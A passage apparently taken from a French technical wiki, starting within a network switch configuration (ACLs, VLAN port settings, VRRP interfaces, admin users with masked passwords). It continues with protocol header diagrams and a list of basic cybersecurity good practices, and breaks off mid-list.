ip access-list extended name Vlan33_IN index 27 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.12-0.0.0.0
ip access-list extended name Vlan33_IN index 28 permit src 192.168.33.12-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 29 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.21-0.0.0.0
ip access-list extended name Vlan33_IN index 30 permit src 192.168.33.21-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 31 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.22-0.0.0.0
ip access-list extended name Vlan33_IN index 32 permit src 192.168.33.22-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 33 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.23-0.0.0.0
ip access-list extended name Vlan33_IN index 34 permit src 192.168.33.23-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 35 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.31-0.0.0.0
ip access-list extended name Vlan33_IN index 36 permit src 192.168.33.31-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 37 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.32-0.0.0.0
ip access-list extended name Vlan33_IN index 38 permit src 192.168.33.32-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 39 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.33-0.0.0.0
ip access-list extended name Vlan33_IN index 40 permit src 192.168.33.33-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 41 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.34-0.0.0.0
ip access-list extended name Vlan33_IN index 42 permit src 192.168.33.34-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 43 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.35-0.0.0.0
ip access-list extended name Vlan33_IN index 44 permit src 192.168.33.35-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 45 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.36-0.0.0.0
ip access-list extended name Vlan33_IN index 46 permit src 192.168.33.36-0.0.0.0 dst 192.168.28.5-0.0.0.0
ip access-list extended name Vlan33_IN index 47 permit src 192.168.0.150-0.0.0.0 dst 192.168.33.21-0.0.0.0
ip access-list extended name Vlan33_IN index 48 permit src 192.168.33.21-0.0.0.0 dst 192.168.0.150-0.0.0.0
ip access-list extended name Vlan33_IN index 49 permit src 192.168.0.150-0.0.0.0 dst 192.168.33.22-0.0.0.0
ip access-list extended name Vlan33_IN index 50 permit src 192.168.33.22-0.0.0.0 dst 192.168.0.150-0.0.0.0
ip access-list extended name Vlan33_IN index 51 permit src 192.168.0.150-0.0.0.0 dst 192.168.33.23-0.0.0.0
ip access-list extended name Vlan33_IN index 52 permit src 192.168.33.23-0.0.0.0 dst 192.168.0.150-0.0.0.0
ip access-list extended name Vlan33_IN index 53 permit src 192.168.0.151-0.0.0.0 dst 192.168.33.21-0.0.0.0
ip access-list extended name Vlan33_IN index 54 permit src 192.168.33.21-0.0.0.0 dst 192.168.0.151-0.0.0.0
ip access-list extended name Vlan33_IN index 55 permit src 192.168.0.151-0.0.0.0 dst 192.168.33.22-0.0.0.0
ip access-list extended name Vlan33_IN index 56 permit src 192.168.33.22-0.0.0.0 dst 192.168.0.151-0.0.0.0
ip access-list extended name Vlan33_IN index 57 permit src 192.168.0.151-0.0.0.0 dst 192.168.33.23-0.0.0.0
ip access-list extended name Vlan33_IN index 58 permit src 192.168.33.23-0.0.0.0 dst 192.168.0.151-0.0.0.0
ip access-group name Vlan31_IN vlan 31 out sequence 1
ip access-group name Vlan32_IN vlan 32 out sequence 2
ip access-group name Vlan33_IN vlan 32 out sequence 3

interface 1/1
mac notification operation 
device-status link-alarm 
igmp-snooping static-query-port 
name HR-SW607Y 
power-state 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no storm-control flow-control 
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation include 32
vlan tagging 32
vlan participation include 33
vlan tagging 33
vlan participation include 39
vlan tagging 39
exit

interface 1/2
mac notification operation 
device-status link-alarm 
igmp-snooping static-query-port 
name HR-SW602X 
power-state 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no storm-control flow-control 
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation include 32
vlan tagging 32
vlan participation include 33
vlan tagging 33
vlan participation include 39
vlan tagging 39
exit

interface 1/3
mac notification operation 
device-status link-alarm 
name "UPlink HP" 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no storm-control flow-control 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation include 39
vlan tagging 39
exit

interface 1/4
device-status link-alarm 
name PGATEX1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 1/5
mac notification operation 
no auto-negotiate
device-status link-alarm 
name RC-SW603X 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
no storm-control flow-control 
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation include 32
vlan tagging 32
vlan participation exclude 33
vlan participation exclude 39
exit

interface 1/6
shutdown 
ptp v2-boundary-clock vlan-priority 4 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
exit

interface 1/7
device-status link-alarm 
name prov-existantRS30 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
vlan pvid 30 
exit

interface 1/8
device-status link-alarm 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 1/9
device-status link-alarm 
name SVIDNVRW1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
exit

interface 1/10
shutdown 
ptp v2-boundary-clock vlan-priority 4 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
exit

interface 1/11
name SVIDNVRX1 
ptp v2-boundary-clock vlan-priority 4 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 1/12
name SVIDNVRX2 
ptp v2-boundary-clock vlan-priority 4 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 2/1
device-status link-alarm 
name SVIDNVRX1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
vlan pvid 30 
exit

interface 2/2
device-status link-alarm 
name SVIDNVRX2 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
vlan pvid 30 
exit

interface 2/3
device-status link-alarm 
name SDAIANAX1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
exit

interface 2/4
device-status link-alarm 
name SDAIANAX2 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
exit

interface 2/5
device-status link-alarm 
name SDAIANAX3 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
exit

interface 2/6
device-status link-alarm 
name SDAIANAX4 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
exit

interface 2/7
device-status link-alarm 
name SDAIANAX5 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation include 30
vlan tagging 30
vlan participation include 31
vlan tagging 31
vlan participation exclude 32
vlan participation include 33
vlan tagging 33
vlan participation exclude 39
vlan pvid 31 
exit

interface 2/8
shutdown 
ptp v2-boundary-clock vlan-priority 4 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation exclude 33
vlan participation exclude 39
exit

interface 3/1
device-status link-alarm 
name PDECX1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/2
device-status link-alarm 
name PDECX2 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/3
device-status link-alarm 
name PDECX3 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/4
device-status link-alarm 
name PDECX4 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/5
device-status link-alarm 
name PVIDX1 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/6
device-status link-alarm 
name PVIDX2 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/7
device-status link-alarm 
name PVIDX3 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface 3/8
device-status link-alarm 
name PVIDX4 
ptp v2-boundary-clock vlan-priority 4 
security-status no-link 
no spanning-tree edge-auto 
no spanning-tree mode 
vlan participation exclude 1
vlan participation exclude 30
vlan participation exclude 31
vlan participation exclude 32
vlan participation include 33
vlan participation exclude 39
vlan pvid 33 
exit

interface vlan/30
ip routing 
ip address primary 192.168.1.250 255.255.255.0 
no ip proxy-arp operation 
no ip irdp operation 
ip irdp address 224.0.0.1 
ip irdp holdtime 1800 
ip irdp maxadvertinterval 600 
ip irdp minadvertinterval 450 
ip irdp preference 0 
ip ospf area-id 0.0.0.0 
no ip ospf operation 
ip ospf link-type broadcast 
ip ospf priority 1 
ip ospf transmit-delay 1 
ip ospf retransmit-interval 5 
ip ospf hello-interval 10 
ip ospf dead-interval 40 
ip ospf cost auto 
no ip ospf mtu-ignore 
ip ospf authentication type none 
ip ospf authentication key-id 0 
no ip ospf fast-hello 
ip rip authentication type none 
ip rip authentication key-id 0 
ip rip send-version ripv2 
ip rip receive-version both 
no ip igmp operation 
ip igmp querier query-interval 125 
ip igmp version 3 
ip igmp robustness 2 
ip igmp querier last-member-interval 10 
ip igmp querier max-response-time 100 
ip mcast ttl-threshold 1 
ip icmp unreachables 
ip icmp redirects 
ip mtu 1500 
no ip netdirbcast 
ip vrrp add 4 priority 130 interval 1000 preempt enable advertisement-ip 224.0.0.18 preempt-delay 0 notify-ip 192.168.1.251 master-candidate 192.168.1.250 domain-id 4 domain-role supervisor accept-mode enable 
ip vrrp virtual-address add 4 192.168.1.254 
no signal-contact 1 link-alarm 
no ip pim operation 
ip pim hello-interval 30 
no ip pim sparse bsr-border 
ip pim sparse dr-priority 1 
ip pim sparse join-prune-interval 60 
no ip dvmrp operation 
ip dvmrp metric 1 
no device-status link-alarm 
no shutdown 
name encodeurs 
security-status no-link 
exit

interface vlan/31
ip routing 
ip address primary 172.20.0.250 255.255.0.0 
no ip proxy-arp operation 
no ip irdp operation 
ip irdp address 224.0.0.1 
ip irdp holdtime 1800 
ip irdp maxadvertinterval 600 
ip irdp minadvertinterval 450 
ip irdp preference 0 
ip ospf area-id 0.0.0.0 
no ip ospf operation 
ip ospf link-type broadcast 
ip ospf priority 1 
ip ospf transmit-delay 1 
ip ospf retransmit-interval 5 
ip ospf hello-interval 10 
ip ospf dead-interval 40 
ip ospf cost auto 
no ip ospf mtu-ignore 
ip ospf authentication type none 
ip ospf authentication key-id 0 
no ip ospf fast-hello 
ip rip authentication type none 
ip rip authentication key-id 0 
ip rip send-version ripv2 
ip rip receive-version both 
no ip igmp operation 
ip igmp querier query-interval 125 
ip igmp version 3 
ip igmp robustness 2 
ip igmp querier last-member-interval 10 
ip igmp querier max-response-time 100 
ip mcast ttl-threshold 1 
ip icmp unreachables 
ip icmp redirects 
ip mtu 1500 
no ip netdirbcast 
ip vrrp add 1 priority 130 interval 1000 preempt enable advertisement-ip 224.0.0.18 preempt-delay 0 notify-ip 172.20.0.251 master-candidate 172.20.0.250 domain-id 1 domain-role supervisor accept-mode enable 
ip vrrp virtual-address add 1 172.20.0.254 
no signal-contact 1 link-alarm 
no ip pim operation 
ip pim hello-interval 30 
no ip pim sparse bsr-border 
ip pim sparse dr-priority 1 
ip pim sparse join-prune-interval 60 
no ip dvmrp operation 
ip dvmrp metric 1 
no device-status link-alarm 
no shutdown 
name cameras 
security-status no-link 
exit

interface vlan/32
ip routing 
ip address primary 192.168.32.250 255.255.255.0 
no ip proxy-arp operation 
no ip irdp operation 
ip irdp address 224.0.0.1 
ip irdp holdtime 1800 
ip irdp maxadvertinterval 600 
ip irdp minadvertinterval 450 
ip irdp preference 0 
ip ospf area-id 0.0.0.0 
no ip ospf operation 
ip ospf link-type broadcast 
ip ospf priority 1 
ip ospf transmit-delay 1 
ip ospf retransmit-interval 5 
ip ospf hello-interval 10 
ip ospf dead-interval 40 
ip ospf cost auto 
no ip ospf mtu-ignore 
ip ospf authentication type none 
ip ospf authentication key-id 0 
no ip ospf fast-hello 
ip rip authentication type none 
ip rip authentication key-id 0 
ip rip send-version ripv2 
ip rip receive-version both 
no ip igmp operation 
ip igmp querier query-interval 125 
ip igmp version 3 
ip igmp robustness 2 
ip igmp querier last-member-interval 10 
ip igmp querier max-response-time 100 
ip mcast ttl-threshold 1 
ip icmp unreachables 
ip icmp redirects 
ip mtu 1500 
no ip netdirbcast 
ip vrrp add 2 priority 130 interval 1000 preempt enable advertisement-ip 224.0.0.18 preempt-delay 0 notify-ip 192.168.32.251 master-candidate 192.168.32.250 domain-id 2 domain-role supervisor accept-mode enable 
ip vrrp virtual-address add 2 192.168.32.254 
no signal-contact 1 link-alarm 
no ip pim operation 
ip pim hello-interval 30 
no ip pim sparse bsr-border 
ip pim sparse dr-priority 1 
ip pim sparse join-prune-interval 60 
no ip dvmrp operation 
ip dvmrp metric 1 
no device-status link-alarm 
no shutdown 
name admin 
security-status no-link 
exit

interface vlan/33
ip routing 
ip address primary 192.168.33.250 255.255.255.0 
no ip proxy-arp operation 
no ip irdp operation 
ip irdp address 224.0.0.1 
ip irdp holdtime 1800 
ip irdp maxadvertinterval 600 
ip irdp minadvertinterval 450 
ip irdp preference 0 
ip ospf area-id 0.0.0.0 
no ip ospf operation 
ip ospf link-type broadcast 
ip ospf priority 1 
ip ospf transmit-delay 1 
ip ospf retransmit-interval 5 
ip ospf hello-interval 10 
ip ospf dead-interval 40 
ip ospf cost auto 
no ip ospf mtu-ignore 
ip ospf authentication type none 
ip ospf authentication key-id 0 
no ip ospf fast-hello 
ip rip authentication type none 
ip rip authentication key-id 0 
ip rip send-version ripv2 
ip rip receive-version both 
no ip igmp operation 
ip igmp querier query-interval 125 
ip igmp version 3 
ip igmp robustness 2 
ip igmp querier last-member-interval 10 
ip igmp querier max-response-time 100 
ip mcast ttl-threshold 1 
ip icmp unreachables 
ip icmp redirects 
ip mtu 1500 
no ip netdirbcast 
ip vrrp add 3 priority 130 interval 1000 preempt enable advertisement-ip 224.0.0.18 preempt-delay 0 notify-ip 192.168.33.251 master-candidate 192.168.33.250 domain-id 3 domain-role supervisor accept-mode enable 
ip vrrp virtual-address add 3 192.168.33.254 
no signal-contact 1 link-alarm 
no ip pim operation 
ip pim hello-interval 30 
no ip pim sparse bsr-border 
ip pim sparse dr-priority 1 
ip pim sparse join-prune-interval 60 
no ip dvmrp operation 
ip dvmrp metric 1 
no device-status link-alarm 
no shutdown 
name video 
security-status no-link 
exit

interface vlan/39
ip routing 
ip address primary 192.168.39.250 255.255.255.0 
no ip proxy-arp operation 
no ip irdp operation 
ip irdp address 224.0.0.1 
ip irdp holdtime 1800 
ip irdp maxadvertinterval 600 
ip irdp minadvertinterval 450 
ip irdp preference 0 
ip ospf area-id 0.0.0.0 
no ip ospf operation 
ip ospf link-type broadcast 
ip ospf priority 1 
ip ospf transmit-delay 1 
ip ospf retransmit-interval 5 
ip ospf hello-interval 10 
ip ospf dead-interval 40 
ip ospf cost auto 
no ip ospf mtu-ignore 
ip ospf authentication type none 
ip ospf authentication key-id 0 
no ip ospf fast-hello 
ip rip authentication type none 
ip rip authentication key-id 0 
ip rip send-version ripv2 
ip rip receive-version both 
no ip igmp operation 
ip igmp querier query-interval 125 
ip igmp version 3 
ip igmp robustness 2 
ip igmp querier last-member-interval 10 
ip igmp querier max-response-time 100 
ip mcast ttl-threshold 1 
ip icmp unreachables 
ip icmp redirects 
ip mtu 1500 
no ip netdirbcast 
ip vrrp add 6 priority 130 interval 1000 preempt enable advertisement-ip 224.0.0.18 preempt-delay 0 notify-ip 192.168.39.251 master-candidate 192.168.39.250 domain-id 6 domain-role member accept-mode enable 
ip vrrp virtual-address add 6 192.168.39.254 
no signal-contact 1 link-alarm 
no ip pim operation 
ip pim hello-interval 30 
no ip pim sparse bsr-border 
ip pim sparse dr-priority 1 
ip pim sparse join-prune-interval 60 
no ip dvmrp operation 
ip dvmrp metric 1 
no device-status link-alarm 
no shutdown 
name interco 
no security-status no-link 
exit

users add "AdminBPNL"
users add "AdminBYES"
users add "snmpBPNL"
users delete admin 
users access-role AdminBPNL administrator 
users access-role AdminBYES administrator 
users access-role snmpBPNL guest 
users lock-status AdminBPNL unlock 
users lock-status AdminBYES unlock 
users lock-status snmpBPNL unlock 
! users password AdminBPNL "********"
! users password AdminBYES "********"
! users password snmpBPNL "********"
users password-policy-check AdminBPNL disable 
users password-policy-check AdminBYES disable 
users password-policy-check snmpBPNL disable 
users snmpv3 authentication AdminBPNL sha1 
users snmpv3 authentication AdminBYES sha1 
users snmpv3 authentication snmpBPNL sha1 
users snmpv3 encryption AdminBPNL aescfb128 
users snmpv3 encryption AdminBYES aescfb128 
users snmpv3 encryption snmpBPNL aescfb128 
users enable AdminBPNL 
users enable AdminBYES 
users enable snmpBPNL 
exit

```

# Réseau - Entêtes des trames

### TCP

[![tcpheader.jpg](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/tcpheader-jpg.jpeg)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/tcpheader-jpg.jpeg)

---

### UDP

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/tuJimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/tuJimage-png.png)

---

### IP

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Thuimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Thuimage-png.png)

# Sécurité

Contient les ressources liés à la cybersécurité.

# Déroulé d'une attaque type

[https://www.stoik.com/cyberattaque-etapes](https://www.stoik.com/cyberattaque-etapes)

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/AN9image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/AN9image-png.png)

# Etat des cybermenaces (2025)

[![2024 Cyber Attack Perceptions Chart - Square.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/2024-cyber-attack-perceptions-chart-square-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/2024-cyber-attack-perceptions-chart-square-png.png)

# Evaluation des risques cybersécurité

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/JF1image-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/JF1image-png.png)

# Golden rules

La réduction des risques induits par l’usage des technologies numériques repose d’abord sur le respect de bonnes pratiques à adopter. À elles seules, ces dix règles d’or vous protègeront de la majorité des risques numériques qui pèsent sur vos usages personnels ou professionnels.

### 1. Séparez strictement vos usages à caractère personnel de ceux à caractère professionnel

Avec l’avènement d’Internet et l’évolution des usages, la frontière entre vie professionnelle et vie personnelle devient de plus en plus poreuse. Pour sécuriser au mieux vos usages numériques dans ces différents environnements :

<div class="field__item" id="bkmrk-evitez-d%E2%80%99utiliser-vo"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Evitez d’utiliser vos moyens personnels (téléphone mobile, clé USB, etc.) à des fins professionnelles et inversement.
- N’utilisez pas votre adresse email professionnelle pour vous inscrire sur des sites Internet à titre personnel et réciproquement.
- Ne connectez pas d’équipements personnels, ou non fournis par votre service informatique, au réseau de votre entité ou à un équipement professionnel (téléphone mobile personnel, clé USB ou gadget électronique offert, etc.) ; ne connectez vos équipements professionnels sur votre réseau personnel que dans les conditions prévues par votre service informatique.

</div></div></div></div>### 2. Mettez régulièrement à jour vos outils numériques

Un appareil ou un logiciel qui n’est pas à jour devient vulnérable. Après avoir identifié l’ensemble de vos appareils et logiciels :

<div class="field__item" id="bkmrk-appliquez-les-mises-"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Appliquez les mises à a jour dès qu’elles vous sont proposées.
- Téléchargez les mises à jour uniquement depuis les sites officiels des éditeurs.
- Activez l’option de téléchargement et d’installation automatique des mises à jour, quand elle existe.

</div></div></div></div>### 3. Protégez vos accès par une authentification double-facteur lorsque c’est possible, ou *a minima* par des mots de passe robustes

Il est important d’utiliser un mot de passe différent pour chaque accès (messagerie, banque en ligne, comptes de réseaux sociaux, etc.) afin d’éviter l’effet boule de neige en cas de compromission de l’un de vos comptes.

<div class="field__item" id="bkmrk-cr%C3%A9ez-un-mot-de-pass"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Créez un mot de passe robuste (suffisamment long, complexe et aléatoire) de 12 caractères minimum et contenant des minuscules, des majuscules, des chiffres et des caractères spéciaux ; les phrases de passe (par exemple, une phrase prise au hasard dans un livre) constituent une bonne alternative parfois plus simple à mémoriser.
- Ne communiquez jamais votre mot de passe à un tiers : aucune organisation ou personne de confiance ne vous demandera de lui communiquer votre mot de passe.

</div></div></div></div>***A savoir : un coffre-fort de mots de passe permet de stocker de manière sécurisée l’ensemble de vos mots de passe et vous permet d’en générer de manière aléatoire.***

### 4. Ne laissez pas vos équipements sans surveillance

Lorsque vous êtes en déplacement, veillez à ne jamais laisser vos appareils sans surveillance. Vous vous exposez au vol, à la manipulation et la compromission desdits matériels et de vos données.

Lorsque vous n’utilisez pas votre poste de travail (même au bureau et à la maison), pensez à le verrouiller et placer en lieu sûr l’ensemble de votre matériel informatique (support de stockage, etc.).

### 5. Prenez soin de vos informations personnelles en ligne

Chacun est responsable de ce qu’il diffuse sur Internet.

<div class="field__item" id="bkmrk-ne-communiquez-jamai"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Ne communiquez jamais d’informations sensibles sur des sites qui ne vous semblent pas suffisamment protégés, surtout lorsque la mention “Non sécurisé” apparaît à gauche de l’adresse du site Internet.
- Veillez à bien identifier les personnes avec qui vous communiquez sur Internet ; en cas de doute sur une identité, contactez cette personne par un autre moyen avant d'effectuer la moindre action ou de répondre à une requête.

</div></div></div></div>### 6. Protégez votre messagerie électronique

L’hameçonnage (ou *phishing* en anglais) désigne une technique frauduleuse qui consiste à usurper l’identité d’un organisme connu (banque, opérateurs, etc.) ou d’un proche pour récupérer des informations.

<div class="field__item" id="bkmrk-ne-cliquez-jamais-su"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Ne cliquez jamais sur un lien et/ou une pièce jointe qui vous semblent douteux ; en cas de suspicion, passez la souris sur le lien pour voir apparaître l’adresse vers laquelle il dirige et appréciez sa légitimité.
- Ne répondez jamais à un mail suspect ; au moindre doute, contactez l’expéditeur par un autre canal.
- Activez la double authentification pour sécuriser vos accès si le fournisseur de messagerie le permet.

</div></div></div></div>### 7. Évitez les réseaux Wi-Fi publics ou inconnus

S’ils peuvent s’avérer très utiles, les réseaux Wi-Fi publics sont une aubaine pour les attaquants. Très faciles d’accès, ces réseaux peuvent être contrôlés pour intercepter vos informations.

<div class="field__item" id="bkmrk-d%C3%A9sactivez-les-conne"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Désactivez les connexions sans-fil (Wi-Fi, Bluetooth, NFC, etc.) lorsque vous ne vous en servez pas pour éviter que vos appareils s’y connectent automatiquement.
- Lorsque cela est possible, préférez le partage de connexion depuis votre mobile ; sécurisez la connexion avec un mot de passe robuste.
- Si vous n’avez d’autre choix que d’utiliser un Wi-Fi public, veillez à ne jamais y réaliser d’opérations à caractère sensible (paiement par carte bancaire, déclaration d’impôts, renseignement d’informations confidentielles, etc.) et utilisez, si possible, un réseau privé virtuel (VPN).

</div></div></div></div>### 8. Sauvegardez régulièrement vos données

Effectuez des sauvegardes régulières de vos données personnelles et professionnelles sur des supports distincts selon les usages, et placez-les en sécurité. Cela vous protège en cas de panne, de perte, de vol, de destruction de votre matériel ou d'attaque informatique.

<div class="field__item" id="bkmrk-utilisez-des-stockag"><div class="paragraph paragraph--type--op-texte-riche paragraph--view-mode--default"><div class="text-riche"><div class="clearfix text-formatted field field--name-field-texte-riche field--type-text-long field--label-hidden field__item">- Utilisez des stockages externes (clé USB, disque dur, etc.) ou optez pour un service de stockage en ligne (*cloud*).
- Privilégiez les capacités de stockage mises à disposition par votre entreprise pour vos données professionnelles.
- Chiffrez le contenu de vos appareils de stockage.
- Réalisez des sauvegardes non connectées de manière régulière.

</div></div></div></div>### 9. Protégez-vous des virus et autres logiciels malveillants

Sur Internet, les logiciels malveillants (virus, vers, cheval de Troie, logiciel espion, etc.) représentent un risque réel. Ils sont distribués par de nombreux vecteurs dont vous pouvez vous protéger grâce à :

